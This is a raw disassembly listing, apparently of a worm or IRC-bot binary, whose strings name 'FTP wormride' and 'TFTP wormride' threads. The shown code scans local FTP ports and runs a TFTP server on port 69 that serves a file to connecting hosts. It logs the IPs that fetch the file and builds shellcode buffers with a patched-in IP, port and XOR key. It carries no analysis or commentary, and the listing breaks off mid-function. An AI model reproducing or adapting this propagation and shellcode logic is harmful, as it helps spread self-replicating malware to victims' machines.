push [ebp+arg_0]
call sub_40546E
pop ecx
pop ecx
test eax, eax
jnz short loc_411A29
xor eax, eax
jmp locret_411BBA
; ---------------------------------------------------------------------------
loc_411A29: ; CODE XREF: sub_411A09+17�j
push 200h
lea eax, [ebp+var_200]
push eax
push [ebp+arg_0]
call sub_4053DC
add esp, 0Ch
mov [ebp+var_204], eax
cmp [ebp+var_204], 0
jz short loc_411A58
cmp [ebp+var_204], 0FFFFFFFFh
jnz short loc_411A5F
loc_411A58: ; CODE XREF: sub_411A09+44�j
xor eax, eax
jmp locret_411BBA
; ---------------------------------------------------------------------------
loc_411A5F: ; CODE XREF: sub_411A09+4D�j
lea eax, [ebp+var_200]
push eax
call sub_407BF5
pop ecx
push offset dword_41C6D8
lea eax, [ebp+var_200]
push eax
call sub_416DDE ; strcmp
pop ecx
pop ecx
test eax, eax
jz short loc_411A8A
xor eax, eax
jmp locret_411BBA
; ---------------------------------------------------------------------------
loc_411A8A: ; CODE XREF: sub_411A09+78�j
push offset dword_41C6CC
lea eax, [ebp+var_200]
push eax
call sub_416B5E ; sprintf
pop ecx
pop ecx
lea eax, [ebp+var_200]
push eax
call sub_416B40 ; strlen
pop ecx
push eax
lea eax, [ebp+var_200]
push eax
push [ebp+arg_0]
call sub_4053BF
add esp, 0Ch
push 32h
push 200h
lea eax, [ebp+var_200]
push eax
push [ebp+arg_0]
call sub_405443
add esp, 10h
mov [ebp+var_204], eax
cmp [ebp+var_204], 0
jz short loc_411AEE
cmp [ebp+var_204], 0FFFFFFFFh
jnz short loc_411AF5
loc_411AEE: ; CODE XREF: sub_411A09+DA�j
xor eax, eax
jmp locret_411BBA
; ---------------------------------------------------------------------------
loc_411AF5: ; CODE XREF: sub_411A09+E3�j
lea eax, [ebp+var_200]
push eax
call sub_407BF5
pop ecx
push offset dword_41C6C8
lea eax, [ebp+var_200]
push eax
call sub_416DDE ; strcmp
pop ecx
pop ecx
test eax, eax
jz short loc_411B20
xor eax, eax
jmp locret_411BBA
; ---------------------------------------------------------------------------
loc_411B20: ; CODE XREF: sub_411A09+10E�j
call sub_410422
push eax
push offset dword_41C6BC
lea eax, [ebp+var_200]
push eax
call sub_416B5E ; sprintf
add esp, 0Ch
lea eax, [ebp+var_200]
push eax
call sub_416B40 ; strlen
pop ecx
push eax
lea eax, [ebp+var_200]
push eax
push [ebp+arg_0]
call sub_4053BF
add esp, 0Ch
push 32h
push 200h
lea eax, [ebp+var_200]
push eax
push [ebp+arg_0]
call sub_405443
add esp, 10h
mov [ebp+var_204], eax
cmp [ebp+var_204], 0
jz short loc_411B8B
cmp [ebp+var_204], 0FFFFFFFFh
jnz short loc_411B8F
loc_411B8B: ; CODE XREF: sub_411A09+177�j
xor eax, eax
jmp short locret_411BBA
; ---------------------------------------------------------------------------
loc_411B8F: ; CODE XREF: sub_411A09+180�j
lea eax, [ebp+var_200]
push eax
call sub_407BF5
pop ecx
push offset dword_41C6B8
lea eax, [ebp+var_200]
push eax
call sub_416DDE ; strcmp
pop ecx
pop ecx
test eax, eax
jz short loc_411BB7
xor eax, eax
jmp short locret_411BBA
; ---------------------------------------------------------------------------
loc_411BB7: ; CODE XREF: sub_411A09+1A8�j
push 1
pop eax
locret_411BBA: ; CODE XREF: sub_411A09+1B�j
; sub_411A09+51�j ...
leave
retn
sub_411A09 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_411BBC proc near ; CODE XREF: sub_411D59+6�p
var_1C8 = dword ptr -1C8h
var_1C4 = dword ptr -1C4h
var_1C0 = dword ptr -1C0h
var_1BC = byte ptr -1BCh
var_18 = byte ptr -18h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 1C8h
push 1A7h
push [ebp+arg_0]
lea eax, [ebp+var_1C0]
push eax
call sub_416B52 ; memcpy
add esp, 0Ch
push [ebp+arg_0]
call sub_416B4C ; free
pop ecx
mov [ebp+var_4], 1
and [ebp+var_10], 0
and [ebp+var_C], 0
mov [ebp+var_8], 1
jmp short loc_411C04
; ---------------------------------------------------------------------------
loc_411BFD: ; CODE XREF: sub_411BBC:loc_411CAB�j
mov eax, [ebp+var_8]
inc eax
mov [ebp+var_8], eax
loc_411C04: ; CODE XREF: sub_411BBC+3F�j
cmp [ebp+var_8], 0FFFFh
jnb loc_411CB0
push 0Ah
lea eax, [ebp+var_18]
push eax
push [ebp+var_8]
call sub_416F7A ; _itoa
add esp, 0Ch
push 0FFFFFFFFh
push 0
lea eax, [ebp+var_18]
push eax
push offset a127_0_0_1 ; "127.0.0.1"
call sub_4050EA
add esp, 10h
mov [ebp+var_1C4], eax
cmp [ebp+var_1C4], 0
jz short loc_411CAB
push [ebp+var_1C4]
call sub_411A09
pop ecx
test eax, eax
jz short loc_411C9F
mov eax, [ebp+var_C]
inc eax
mov [ebp+var_C], eax
cmp [ebp+var_4], 0
jnz short loc_411C76
push 2
lea eax, [ebp+var_18]
push eax
push [ebp+var_10]
call sub_404871
add esp, 0Ch
jmp short loc_411C9F
; ---------------------------------------------------------------------------
loc_411C76: ; CODE XREF: sub_411BBC+A5�j
push 2
lea eax, [ebp+var_18]
push eax
call sub_4046BC
pop ecx
pop ecx
mov [ebp+var_10], eax
cmp [ebp+var_10], 0
jnz short loc_411C9F
push [ebp+var_1C0]
call sub_409763
pop ecx
xor eax, eax
jmp locret_411D55
; ---------------------------------------------------------------------------
loc_411C9F: ; CODE XREF: sub_411BBC+98�j
; sub_411BBC+B8�j ...
push [ebp+var_1C4]
call sub_4053B1
pop ecx
loc_411CAB: ; CODE XREF: sub_411BBC+88�j
jmp loc_411BFD
; ---------------------------------------------------------------------------
loc_411CB0: ; CODE XREF: sub_411BBC+4F�j
cmp [ebp+var_10], 0
jnz short loc_411CC9
push [ebp+var_1C0]
call sub_409763
pop ecx
xor eax, eax
jmp locret_411D55
; ---------------------------------------------------------------------------
loc_411CC9: ; CODE XREF: sub_411BBC+F8�j
mov eax, [ebp+var_1C0]
push dword ptr [eax]
push offset unk_41C6DC
lea eax, [ebp+var_1BC]
push eax
call sub_40D53F
add esp, 0Ch
loc_411CE5: ; CODE XREF: sub_411BBC:loc_411D3C�j
push 3E8h
push [ebp+var_10]
call sub_4048EF
pop ecx
pop ecx
mov [ebp+var_1C8], eax
cmp [ebp+var_1C8], 0
jz short loc_411D2E
cmp [ebp+var_1C8], 0FFFFFFFFh
jz short loc_411D2E
push [ebp+var_1C8]
push offset sub_41113B
call sub_409479
pop ecx
pop ecx
test eax, eax
jnz short loc_411D2E
push [ebp+var_1C8]
call sub_4053B1
pop ecx
loc_411D2E: ; CODE XREF: sub_411BBC+145�j
; sub_411BBC+14E�j ...
mov eax, [ebp+var_1C0]
cmp dword ptr [eax+4], 0
jz short loc_411D3C
jmp short loc_411D3E
; ---------------------------------------------------------------------------
loc_411D3C: ; CODE XREF: sub_411BBC+17C�j
jmp short loc_411CE5
; ---------------------------------------------------------------------------
loc_411D3E: ; CODE XREF: sub_411BBC+17E�j
push [ebp+var_10]
call sub_404CBB
pop ecx
push [ebp+var_1C0]
call sub_409763
pop ecx
xor eax, eax
locret_411D55: ; CODE XREF: sub_411BBC+DE�j
; sub_411BBC+108�j
leave
retn 4
sub_411BBC endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_411D59 proc near ; DATA XREF: sub_411D68+4E�o
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push [ebp+arg_0]
call sub_411BBC
pop ebp
retn 4
sub_411D59 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_411D68 proc near ; CODE XREF: sub_40A9CF+70F�p
; sub_40A9CF+735�p
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push ecx
call sub_4042FB
test eax, eax
jz short loc_411D77
jmp short locret_411DC3
; ---------------------------------------------------------------------------
loc_411D77: ; CODE XREF: sub_411D68+B�j
push 1A7h
call sub_416B46 ; malloc
pop ecx
mov [ebp+var_4], eax
cmp [ebp+var_4], 0
jnz short loc_411D8D
jmp short locret_411DC3
; ---------------------------------------------------------------------------
loc_411D8D: ; CODE XREF: sub_411D68+21�j
push [ebp+arg_0]
mov eax, [ebp+var_4]
add eax, 4
push eax
call sub_405F67
pop ecx
pop ecx
push offset aFtpWormrideThr ; "FTP wormride thread"
mov eax, [ebp+arg_0]
movsx eax, byte ptr [eax+18Bh]
neg eax
sbb eax, eax
inc eax
push eax
push [ebp+var_4]
push offset sub_411D59
call sub_4095A4
add esp, 10h
locret_411DC3: ; CODE XREF: sub_411D68+D�j
; sub_411D68+23�j
leave
retn
sub_411D68 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_411DC5 proc near ; DATA XREF: sub_4123F6+43�o
var_DAC = dword ptr -0DACh
var_DA8 = dword ptr -0DA8h
var_DA4 = dword ptr -0DA4h
var_DA0 = byte ptr -0DA0h
var_D9C = dword ptr -0D9Ch
var_D98 = byte ptr -0D98h
var_D94 = dword ptr -0D94h
var_D90 = dword ptr -0D90h
var_D8C = dword ptr -0D8Ch
var_D88 = dword ptr -0D88h
var_D84 = dword ptr -0D84h
var_D80 = byte ptr -0D80h
var_D7C = dword ptr -0D7Ch
var_D70 = byte ptr -0D70h
var_D6F = byte ptr -0D6Fh
var_D6E = byte ptr -0D6Eh
var_D6D = byte ptr -0D6Dh
var_D6C = byte ptr -0D6Ch
var_B6C = dword ptr -0B6Ch
var_B68 = dword ptr -0B68h
var_B64 = dword ptr -0B64h
var_B60 = dword ptr -0B60h
var_B5C = dword ptr -0B5Ch
var_B58 = dword ptr -0B58h
var_358 = dword ptr -358h
var_354 = byte ptr -354h
var_1B0 = word ptr -1B0h
var_1AE = word ptr -1AEh
var_1AC = dword ptr -1ACh
var_1A0 = dword ptr -1A0h
var_19C = byte ptr -19Ch
var_19B = byte ptr -19Bh
var_19A = byte ptr -19Ah
var_199 = byte ptr -199h
var_11C = byte ptr -11Ch
var_10C = dword ptr -10Ch
var_108 = dword ptr -108h
var_104 = byte ptr -104h
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 0DACh
push edi
push 1A7h
push [ebp+arg_0]
lea eax, [ebp+var_358]
push eax
call sub_416B52 ; memcpy
add esp, 0Ch
push [ebp+arg_0]
call sub_416B4C ; free
pop ecx
push 0
push 2
push 2
call ds:dword_417218 ; socket
mov [ebp+var_108], eax
cmp [ebp+var_108], 0FFFFFFFFh
jnz short loc_411E1D
push [ebp+var_358]
call sub_409763
pop ecx
xor eax, eax
jmp loc_4123F1
; ---------------------------------------------------------------------------
loc_411E1D: ; CODE XREF: sub_411DC5+43�j
lea eax, [ebp+var_104]
push eax
call sub_40CF25
push eax
call sub_40449C
pop ecx
pop ecx
push 10h
push 0
lea eax, [ebp+var_1B0]
push eax
call sub_416B6A ; memset
add esp, 0Ch
mov [ebp+var_1B0], 2
push 45h
call ds:dword_417238 ; htons
mov [ebp+var_1AE], ax
lea eax, [ebp+var_104]
push eax
call ds:dword_417244 ; inet_addr
mov [ebp+var_1AC], eax
mov [ebp+var_1A0], 1
push 4
lea eax, [ebp+var_1A0]
push eax
push 4
push 0FFFFh
push [ebp+var_108]
call ds:dword_417204 ; setsockopt
push 10h
lea eax, [ebp+var_1B0]
push eax
push [ebp+var_108]
call ds:dword_417208 ; bind
cmp eax, 0FFFFFFFFh
jnz short loc_411EC2
push [ebp+var_358]
call sub_409763
pop ecx
xor eax, eax
jmp loc_4123F1
; ---------------------------------------------------------------------------
loc_411EC2: ; CODE XREF: sub_411DC5+E8�j
push offset aRb ; "rb"
push offset dword_41EBFC
call sub_416B88 ; fopen
pop ecx
pop ecx
mov [ebp+var_10C], eax
cmp [ebp+var_10C], 0
jnz short loc_411F01
push [ebp+var_108]
call ds:dword_417230 ; closesocket
push [ebp+var_358]
call sub_409763
pop ecx
xor eax, eax
jmp loc_4123F1
; ---------------------------------------------------------------------------
loc_411F01: ; CODE XREF: sub_411DC5+11B�j
mov eax, [ebp+var_358]
push dword ptr [eax]
push offset unk_41C788
lea eax, [ebp+var_354]
push eax
call sub_40D53F
add esp, 0Ch
push 2
push 0
push [ebp+var_10C]
call sub_416B96 ; fseek
add esp, 0Ch
push [ebp+var_10C]
call sub_416B76 ; ftell
pop ecx
mov [ebp+var_4], eax
push 0
push 0
push [ebp+var_10C]
call sub_416B96 ; fseek
add esp, 0Ch
push 80h
push 0
lea eax, [ebp+var_19C]
push eax
call sub_416B6A ; memset
add esp, 0Ch
loc_411F66: ; CODE XREF: sub_411DC5:loc_412084�j
; sub_411DC5:loc_4123C6�j
mov [ebp+var_B64], 1
and [ebp+var_B60], 0
and [ebp+var_B5C], 0
loc_411F7E: ; CODE XREF: sub_411DC5+234�j
and [ebp+var_B68], 0
jmp short loc_411F94
; ---------------------------------------------------------------------------
loc_411F87: ; CODE XREF: sub_411DC5:loc_411FB9�j
mov eax, [ebp+var_B68]
inc eax
mov [ebp+var_B68], eax
loc_411F94: ; CODE XREF: sub_411DC5+1C0�j
mov eax, [ebp+var_B68]
cmp eax, [ebp+var_B5C]
jnb short loc_411FBB
mov eax, [ebp+var_B68]
mov eax, [ebp+eax*4+var_B58]
cmp eax, [ebp+var_108]
jnz short loc_411FB9
jmp short loc_411FBB
; ---------------------------------------------------------------------------
loc_411FB9: ; CODE XREF: sub_411DC5+1F0�j
jmp short loc_411F87
; ---------------------------------------------------------------------------
loc_411FBB: ; CODE XREF: sub_411DC5+1DB�j
; sub_411DC5+1F2�j
mov eax, [ebp+var_B68]
cmp eax, [ebp+var_B5C]
jnz short loc_411FF5
cmp [ebp+var_B5C], 200h
jnb short loc_411FF5
mov eax, [ebp+var_B68]
mov ecx, [ebp+var_108]
mov [ebp+eax*4+var_B58], ecx
mov eax, [ebp+var_B5C]
inc eax
mov [ebp+var_B5C], eax
loc_411FF5: ; CODE XREF: sub_411DC5+202�j
; sub_411DC5+20E�j
xor eax, eax
test eax, eax
jnz short loc_411F7E
lea eax, [ebp+var_B64]
push eax
push 0
push 0
lea eax, [ebp+var_B5C]
push eax
push 0
call ds:dword_41722C ; select
test eax, eax
jle loc_4123B8
mov [ebp+var_D84], 10h
mov al, ds:byte_41DF00
mov [ebp+var_D70], al
mov ecx, 80h
xor eax, eax
lea edi, [ebp+var_D6F]
rep stosd
stosw
stosb
lea eax, [ebp+var_D84]
push eax
lea eax, [ebp+var_D80]
push eax
push 0
push 80h
lea eax, [ebp+var_19C]
push eax
push [ebp+var_108]
call ds:dword_417258 ; recvfrom
mov [ebp+var_B6C], eax
cmp [ebp+var_B6C], 0
jz short loc_412084
cmp [ebp+var_B6C], 0FFFFFFFFh
jnz short loc_412089
loc_412084: ; CODE XREF: sub_411DC5+2B4�j
jmp loc_411F66
; ---------------------------------------------------------------------------
loc_412089: ; CODE XREF: sub_411DC5+2BD�j
movsx eax, [ebp+var_19C]
test eax, eax
jnz loc_4121C0
movsx eax, [ebp+var_19B]
cmp eax, 1
jnz loc_4121C0
lea eax, [ebp+var_19C]
mov [ebp+var_D88], eax
lea eax, [ebp+var_19C]
mov [ebp+var_D8C], eax
mov eax, [ebp+var_D88]
inc eax
inc eax
mov [ebp+var_D88], eax
mov eax, [ebp+var_D8C]
inc eax
inc eax
mov [ebp+var_D8C], eax
push [ebp+var_D8C]
call sub_416B40 ; strlen
pop ecx
mov ecx, [ebp+var_D8C]
lea eax, [ecx+eax+1]
mov [ebp+var_D8C], eax
push offset aOctet ; "octet"
call sub_416B40 ; strlen
pop ecx
push eax
push [ebp+var_D8C]
push offset aOctet ; "octet"
call sub_416BF0 ; strncmp
add esp, 0Ch
test eax, eax
jz short loc_41213F
push [ebp+var_D84]
lea eax, [ebp+var_D80]
push eax
push 0
push 13h
push offset dword_41C76C
push [ebp+var_108]
call ds:dword_417250 ; sendto
jmp short loc_4121BB
; ---------------------------------------------------------------------------
loc_41213F: ; CODE XREF: sub_411DC5+354�j
push 0
push 0
push [ebp+var_10C]
call sub_416B96 ; fseek
add esp, 0Ch
and [ebp+var_D70], 0
mov [ebp+var_D6F], 3
and [ebp+var_D6E], 0
mov [ebp+var_D6D], 1
push [ebp+var_10C]
push 200h
push 1
lea eax, [ebp+var_D6C]
push eax
call sub_416B90 ; fread
add esp, 10h
mov [ebp+var_D90], eax
push [ebp+var_D84]
lea eax, [ebp+var_D80]
push eax
push 0
mov eax, [ebp+var_D90]
add eax, 4
push eax
lea eax, [ebp+var_D70]
push eax
push [ebp+var_108]
call ds:dword_417250 ; sendto
loc_4121BB: ; CODE XREF: sub_411DC5+378�j
jmp loc_4123B8
; ---------------------------------------------------------------------------
loc_4121C0: ; CODE XREF: sub_411DC5+2CD�j
; sub_411DC5+2DD�j
movsx eax, [ebp+var_19C]
test eax, eax
jnz loc_412396
movsx eax, [ebp+var_19B]
cmp eax, 4
jnz loc_412396
mov al, [ebp+var_19A]
mov [ebp+var_DA0], al
mov al, [ebp+var_199]
mov [ebp+var_D98], al
and [ebp+var_D70], 0
mov [ebp+var_D6F], 3
movzx eax, [ebp+var_D98]
cmp eax, 0FFh
jnz short loc_412242
mov al, [ebp+var_DA0]
add al, 1
mov [ebp+var_DA0], al
mov al, [ebp+var_DA0]
mov [ebp+var_D6E], al
and [ebp+var_D98], 0
mov al, [ebp+var_D98]
mov [ebp+var_D6D], al
jmp short loc_412268
; ---------------------------------------------------------------------------
loc_412242: ; CODE XREF: sub_411DC5+44C�j
mov al, [ebp+var_DA0]
mov [ebp+var_D6E], al
mov al, [ebp+var_D98]
add al, 1
mov [ebp+var_D98], al
mov al, [ebp+var_D98]
mov [ebp+var_D6D], al
loc_412268: ; CODE XREF: sub_411DC5+47B�j
movzx eax, [ebp+var_DA0]
shl eax, 8
movzx ecx, [ebp+var_D98]
lea eax, [eax+ecx-1]
mov [ebp+var_D9C], eax
push 0
mov eax, [ebp+var_D9C]
shl eax, 9
push eax
push [ebp+var_10C]
call sub_416B96 ; fseek
add esp, 0Ch
push [ebp+var_10C]
push 200h
push 1
lea eax, [ebp+var_D6C]
push eax
call sub_416B90 ; fread
add esp, 10h
mov [ebp+var_D94], eax
push [ebp+var_D84]
lea eax, [ebp+var_D80]
push eax
push 0
mov eax, [ebp+var_D94]
add eax, 4
push eax
lea eax, [ebp+var_D70]
push eax
push [ebp+var_108]
call ds:dword_417250 ; sendto
cmp [ebp+var_D94], 0
jnz loc_412394
mov eax, [ebp+var_D9C]
shl eax, 9
cmp eax, [ebp+var_4]
jb loc_412394
mov eax, [ebp+var_D7C]
mov [ebp+var_DA8], eax
push [ebp+var_DA8]
push offset dword_41EBE0
call sub_409C9D
pop ecx
pop ecx
mov [ebp+var_DA4], eax
mov eax, [ebp+var_DA4]
cmp eax, [ebp+var_DA8]
jz short loc_412394
push 1
push offset dword_41EBE4
call sub_409C88
pop ecx
pop ecx
mov [ebp+var_DAC], eax
push 10h
push [ebp+var_D7C]
call ds:dword_41721C ; inet_ntoa
push eax
lea eax, [ebp+var_11C]
push eax
call sub_407A56
add esp, 0Ch
lea eax, [ebp+var_11C]
push eax
mov eax, [ebp+var_DAC]
inc eax
push eax
push offset aWormride ; "wormride"
push offset unk_41C730
push offset dword_41DB88
call sub_40D4AB
add esp, 14h
loc_412394: ; CODE XREF: sub_411DC5+52D�j
; sub_411DC5+53F�j ...
jmp short loc_4123B8
; ---------------------------------------------------------------------------
loc_412396: ; CODE XREF: sub_411DC5+404�j
; sub_411DC5+414�j
push [ebp+var_D84]
lea eax, [ebp+var_D80]
push eax
push 0
push 9
push offset dword_41C724
push [ebp+var_108]
call ds:dword_417250 ; sendto
loc_4123B8: ; CODE XREF: sub_411DC5+252�j
; sub_411DC5:loc_4121BB�j ...
mov eax, [ebp+var_358]
cmp dword ptr [eax+4], 0
jz short loc_4123C6
jmp short loc_4123CB
; ---------------------------------------------------------------------------
loc_4123C6: ; CODE XREF: sub_411DC5+5FD�j
jmp loc_411F66
; ---------------------------------------------------------------------------
loc_4123CB: ; CODE XREF: sub_411DC5+5FF�j
push [ebp+var_10C]
call sub_416B82 ; fclose
pop ecx
push [ebp+var_108]
call ds:dword_417230 ; closesocket
push [ebp+var_358]
call sub_409763
pop ecx
xor eax, eax
loc_4123F1: ; CODE XREF: sub_411DC5+53�j
; sub_411DC5+F8�j ...
pop edi
leave
retn 4
sub_411DC5 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4123F6 proc near ; CODE XREF: sub_40A9CF+726�p
; sub_40A9CF+742�p
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push ecx
push 1A7h
call sub_416B46 ; malloc
pop ecx
mov [ebp+var_4], eax
cmp [ebp+var_4], 0
jnz short loc_412410
jmp short locret_412446
; ---------------------------------------------------------------------------
loc_412410: ; CODE XREF: sub_4123F6+16�j
push [ebp+arg_0]
mov eax, [ebp+var_4]
add eax, 4
push eax
call sub_405F67
pop ecx
pop ecx
push offset aTftpWormrideTh ; "TFTP wormride thread"
mov eax, [ebp+arg_0]
movsx eax, byte ptr [eax+18Bh]
neg eax
sbb eax, eax
inc eax
push eax
push [ebp+var_4]
push offset sub_411DC5
call sub_4095A4
add esp, 10h
locret_412446: ; CODE XREF: sub_4123F6+18�j
leave
retn
sub_4123F6 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_412448 proc near ; CODE XREF: sub_4125DF+88�p
; sub_4125DF+AD�p ...
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = byte ptr 18h
push ebp
mov ebp, esp
push ecx
push ecx
and [ebp+var_4], 0
jmp short loc_41245A
; ---------------------------------------------------------------------------
loc_412453: ; CODE XREF: sub_412448:loc_41249A�j
mov eax, [ebp+var_4]
inc eax
mov [ebp+var_4], eax
loc_41245A: ; CODE XREF: sub_412448+9�j
mov eax, [ebp+var_4]
cmp eax, [ebp+arg_4]
jnb short loc_41249C
and [ebp+var_8], 0
jmp short loc_41246F
; ---------------------------------------------------------------------------
loc_412468: ; CODE XREF: sub_412448:loc_412498�j
mov eax, [ebp+var_8]
inc eax
mov [ebp+var_8], eax
loc_41246F: ; CODE XREF: sub_412448+1E�j
mov eax, [ebp+var_8]
cmp eax, [ebp+arg_C]
jnb short loc_41249A
mov eax, [ebp+arg_0]
add eax, [ebp+var_4]
movsx eax, byte ptr [eax]
movsx ecx, [ebp+arg_10]
xor eax, ecx
mov ecx, [ebp+arg_8]
add ecx, [ebp+var_8]
movsx ecx, byte ptr [ecx]
cmp eax, ecx
jnz short loc_412498
push 1
pop eax
jmp short locret_41249E
; ---------------------------------------------------------------------------
loc_412498: ; CODE XREF: sub_412448+49�j
jmp short loc_412468
; ---------------------------------------------------------------------------
loc_41249A: ; CODE XREF: sub_412448+2D�j
jmp short loc_412453
; ---------------------------------------------------------------------------
loc_41249C: ; CODE XREF: sub_412448+18�j
xor eax, eax
locret_41249E: ; CODE XREF: sub_412448+4E�j
leave
retn
sub_412448 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4124A0 proc near ; CODE XREF: sub_4125DF+36�p
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
arg_14 = dword ptr 1Ch
push ebp
mov ebp, esp
sub esp, 10h
and [ebp+var_4], 0
and [ebp+var_10], 0
and [ebp+var_8], 0
and [ebp+var_C], 0
cmp [ebp+arg_8], 1
jnz short loc_41250C
cmp [ebp+arg_4], 0B2h
jnb short loc_4124CC
xor eax, eax
jmp locret_4125DD
; ---------------------------------------------------------------------------
loc_4124CC: ; CODE XREF: sub_4124A0+23�j
mov [ebp+var_C], 0B2h
push [ebp+var_C]
push offset dword_41C964
push [ebp+arg_0]
call sub_416B52 ; memcpy
add esp, 0Ch
mov eax, [ebp+arg_0]
add eax, 8Fh
mov [ebp+var_4], eax
mov eax, [ebp+arg_0]
add eax, 88h
mov [ebp+var_10], eax
mov eax, [ebp+arg_0]
add eax, 0ACh
mov [ebp+var_8], eax
jmp loc_41259C
; ---------------------------------------------------------------------------
loc_41250C: ; CODE XREF: sub_4124A0+1A�j
cmp [ebp+arg_8], 2
jnz short loc_412554
cmp [ebp+arg_4], 0C6h
jnb short loc_412522
xor eax, eax
jmp locret_4125DD
; ---------------------------------------------------------------------------
loc_412522: ; CODE XREF: sub_4124A0+79�j
mov [ebp+var_C], 0C6h
push [ebp+var_C]
push offset dword_41C89C
push [ebp+arg_0]
call sub_416B52 ; memcpy
add esp, 0Ch
mov eax, [ebp+arg_0]
add eax, 89h
mov [ebp+var_10], eax
mov eax, [ebp+arg_0]
add eax, 0C0h
mov [ebp+var_8], eax
jmp short loc_41259C
; ---------------------------------------------------------------------------
loc_412554: ; CODE XREF: sub_4124A0+70�j
cmp [ebp+arg_4], 0B2h
jnb short loc_412561
xor eax, eax
jmp short locret_4125DD
; ---------------------------------------------------------------------------
loc_412561: ; CODE XREF: sub_4124A0+BB�j
mov [ebp+var_C], 0B2h
push [ebp+var_C]
push offset dword_41C7E8
push [ebp+arg_0]
call sub_416B52 ; memcpy
add esp, 0Ch
mov eax, [ebp+arg_0]
add eax, 86h
mov [ebp+var_4], eax
mov eax, [ebp+arg_0]
add eax, 8Dh
mov [ebp+var_10], eax
mov eax, [ebp+arg_0]
add eax, 0ACh
mov [ebp+var_8], eax
loc_41259C: ; CODE XREF: sub_4124A0+67�j
; sub_4124A0+B2�j
cmp [ebp+var_4], 0
jz short loc_4125B0
push [ebp+arg_C]
call ds:dword_417244 ; inet_addr
mov ecx, [ebp+var_4]
mov [ecx], eax
loc_4125B0: ; CODE XREF: sub_4124A0+100�j
cmp [ebp+var_10], 0
jz short loc_4125CC
push [ebp+arg_10]
call sub_416B9C ; atoi
pop ecx
push eax
call ds:dword_417238 ; htons
mov ecx, [ebp+var_10]
mov [ecx], ax
loc_4125CC: ; CODE XREF: sub_4124A0+114�j
cmp [ebp+var_8], 0
jz short loc_4125DA
mov eax, [ebp+var_8]
mov ecx, [ebp+arg_14]
mov [eax], ecx
loc_4125DA: ; CODE XREF: sub_4124A0+130�j
mov eax, [ebp+var_C]
locret_4125DD: ; CODE XREF: sub_4124A0+27�j
; sub_4124A0+7D�j ...
leave
retn
sub_4124A0 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4125DF proc near ; CODE XREF: sub_410649+8B�p
; sub_410B52+41�p
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
arg_14 = dword ptr 1Ch
arg_18 = dword ptr 20h
arg_1C = dword ptr 24h
push ebp
mov ebp, esp
sub esp, 1Ch
cmp [ebp+arg_4], 1Ch
jnb short loc_4125F2
xor eax, eax
jmp locret_41271E
; ---------------------------------------------------------------------------
loc_4125F2: ; CODE XREF: sub_4125DF+A�j
mov eax, [ebp+arg_0]
mov [ebp+var_10], eax
mov eax, [ebp+arg_0]
add eax, 1Ch
mov [ebp+var_4], eax
push [ebp+arg_14]
push [ebp+arg_10]
push [ebp+arg_C]
push [ebp+arg_8]
push 1E4h
push [ebp+var_4]
call sub_4124A0
add esp, 18h
mov [ebp+var_14], eax
cmp [ebp+var_14], 0
jnz short loc_41262D
xor eax, eax
jmp locret_41271E
; ---------------------------------------------------------------------------
loc_41262D: ; CODE XREF: sub_4125DF+45�j
push 1Ch
push offset loc_41C7C8
push [ebp+var_10]
call sub_416B52 ; memcpy
add esp, 0Ch
mov eax, ds:dword_41CB98
mov [ebp+var_8], eax
jmp short loc_412659
; ---------------------------------------------------------------------------
loc_412649: ; CODE XREF: sub_4125DF+94�j
; sub_4125DF:loc_41269A�j
call sub_410422
mov [ebp+var_8], eax
mov eax, [ebp+var_8]
mov ds:dword_41CB98, eax
loc_412659: ; CODE XREF: sub_4125DF+68�j
push 0
push [ebp+arg_1C]
push [ebp+arg_18]
push 4
lea eax, [ebp+var_8]
push eax
call sub_412448
add esp, 14h
test eax, eax
jz short loc_412675
jmp short loc_412649
; ---------------------------------------------------------------------------
loc_412675: ; CODE XREF: sub_4125DF+92�j
mov eax, [ebp+var_14]
xor eax, [ebp+var_8]
mov [ebp+var_1C], eax
push 0
push [ebp+arg_1C]
push [ebp+arg_18]
push 4
lea eax, [ebp+var_1C]
push eax
call sub_412448
add esp, 14h
test eax, eax
jnz short loc_41269A
jmp short loc_41269C
; ---------------------------------------------------------------------------
loc_41269A: ; CODE XREF: sub_4125DF+B7�j
jmp short loc_412649
; ---------------------------------------------------------------------------
loc_41269C: ; CODE XREF: sub_4125DF+B9�j
mov eax, [ebp+var_10]
mov ecx, [ebp+var_8]
mov [eax+3], ecx
mov eax, [ebp+var_10]
mov ecx, [ebp+var_1C]
mov [eax+9], ecx
mov al, ds:byte_41CB95
mov byte ptr [ebp+var_C], al
jmp short loc_4126C8
; ---------------------------------------------------------------------------
loc_4126B8: ; CODE XREF: sub_4125DF+104�j
call sub_410461
mov byte ptr [ebp+var_C], al
mov al, byte ptr [ebp+var_C]
mov ds:byte_41CB95, al
loc_4126C8: ; CODE XREF: sub_4125DF+D7�j
push [ebp+var_C]
push [ebp+arg_1C]
push [ebp+arg_18]
